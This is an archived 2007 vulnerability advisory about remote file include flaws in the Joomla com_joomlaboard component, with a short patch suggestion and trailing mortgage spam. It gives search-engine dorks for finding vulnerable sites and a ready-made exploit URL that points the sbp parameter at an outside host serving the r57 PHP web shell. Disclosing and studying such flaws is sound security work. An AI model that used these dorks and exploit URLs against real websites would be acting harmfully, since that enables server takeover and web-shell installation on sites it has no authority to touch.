Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16442
HistoryMar 24, 2007 - 12:00 a.m.

Joomla com_joomlaboard 1.1.x Branch (sbp) Multiple Remote File Include Vulnerabi

2007-03-2400:00:00
vulners.com
28

######################################################

Joomla com_joomlaboard 1.1.x Branch (sbp) Multiple Remote File Include

Vulnerabilities

Joomlaboard Component 1.1.x Branch (sbp) Multiple Remote File Include

Vulnerabilities

######################################################

script :

http://forge.joomla.org/sf/frs/do/viewRelease/projects.simpleboard/frs.joomlaboard_component.joomlaboard_1_1_x_branch

######################################################

files : /image_upload.php , /file_upload.php ,

######################################################

Dork : index2.php?option=com_joomlaboard , allinurl:"com_joomlaboard"

######################################################

Found by & Contact : Cold z3ro , [email protected] ,

http://hack-teach.com/ , Team Hell Crew

######################################################

require_once("$sbp/sb_helpers.php");

require_once("$sbp/sb_helpers.php");

######################################################

exploit :

http://www.example.com/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://nachrichtenmann.de/r57.txt?

http://www.example.com/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://nachrichtenmann.de/r57.txt?

######################################################

How To Fix It : U can put this code - defined( '_VALID_MOS' ) or die(

'Catch Me iF u Can ### Patched By Cold z3ro .' ); - after <?php code start

######################################################

#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine


5.5%* 30 year fixed mortgage rate. Good credit refinance. Up to 5 free
quotes - *Terms
https://www2.nextag.com/goto.jsp?product=100000035&amp;url=&#37;2fst.jsp&amp;tm=y&amp;search=mortgage_text_links_88_h2a5d&amp;s=4056&amp;p=5117&amp;disc=y&amp;vers=910